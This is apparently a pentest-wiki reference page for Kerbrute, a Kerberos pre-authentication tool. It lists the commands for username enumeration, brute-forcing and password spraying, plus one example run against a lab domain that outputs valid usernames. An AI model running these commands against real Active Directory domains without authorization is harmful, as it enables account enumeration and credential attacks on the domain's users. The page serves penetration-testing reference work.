Kerbrute
Jump to navigation
Jump to search
Description
A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication
Installation
https://github.com/ropnop/kerbrute/releases
Usage
Syntax
kerbrute [command]
Available Commands
bruteforce Bruteforce username:password combos, from a file or stdin bruteuser Bruteforce a single user's password from a wordlist help Help about any command passwordspray Test a single password against a list of users userenum Enumerate valid domain usernames via Kerberos version Display version info and quit
Flags
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Example
$ ./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local userlist.txt -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 06/20/20 - Ronnie Flathers @ropnop
2020/06/20 15:45:40 > Using KDC(s):
2020/06/20 15:45:40 > spookysec.local:88
2020/06/20 15:45:40 > [+] VALID USERNAME: [email protected]
2020/06/20 15:45:40 > [+] VALID USERNAME: [email protected]
2020/06/20 15:45:41 > [+] VALID USERNAME: [email protected]
2020/06/20 15:45:41 > [+] VALID USERNAME: [email protected]
2020/06/20 15:45:43 > [+] VALID USERNAME: [email protected]
2020/06/20 15:45:45 > [+] VALID USERNAME: [email protected]
2020/06/20 15:45:48 > [+] VALID USERNAME: [email protected]
[REDACTED]